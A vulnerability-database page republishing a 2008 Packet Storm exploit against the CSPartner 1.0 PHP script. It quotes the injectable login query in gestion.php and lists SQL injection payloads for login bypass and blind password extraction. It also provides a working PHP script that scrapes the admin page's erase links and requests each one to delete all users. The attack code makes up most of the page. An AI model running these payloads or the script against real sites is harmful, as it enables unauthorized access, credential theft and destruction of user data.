Lucene search

K

cspartner-sql.txt

🗓️ 23 Oct 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Remote Exploit in CSPartner 1.0 for SQL Injection in gestion.ph

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<?php  
  
/*  
  
CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit  
----------------------------------------------------------------  
By StAkeR[at]hotmail[dot]it   
http://www.easy-script.com/scripts-dl/cspartne-01.zip  
----------------------------------------------------------------  
  
File gestion.php  
  
5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){  
6. $sql = "SELECT * FROM $tblPartner where pseudo='".$_POST["pseudo"]."' AND password='".$_POST["passe"]."'";  
7. $resultat = mysql_db_query($mydbPartner, $sql);  
  
Blind SQL Injection or Login ByPass for you :P  
  
Examples: ($_POST['pseudo'] and $_POST['passe'])  
  
-1 ' or '1=1  
-2 ' or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/*  
-3 and other :D  
  
  
  
*/  
  
  
error_reporting(0);  
  
$host = $argv[1] or die("Usage: php [exploit.php] [http://localhost/cms]\n");  
  
if(preg_match_all('/erase=(.+?)"/',file_get_contents($host.'/admin/index.php'),$out))  
{  
for($i=0;$i<=count($out);$i++)  
{  
file_get_contents($host.'/admin/index.php?erase='.$out[1][$i]);  
}  
echo "[-] All Users Deleted\n";  
}  
else  
{  
echo "[-] Exploit Failed!\n";  
}  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
16
.json
Report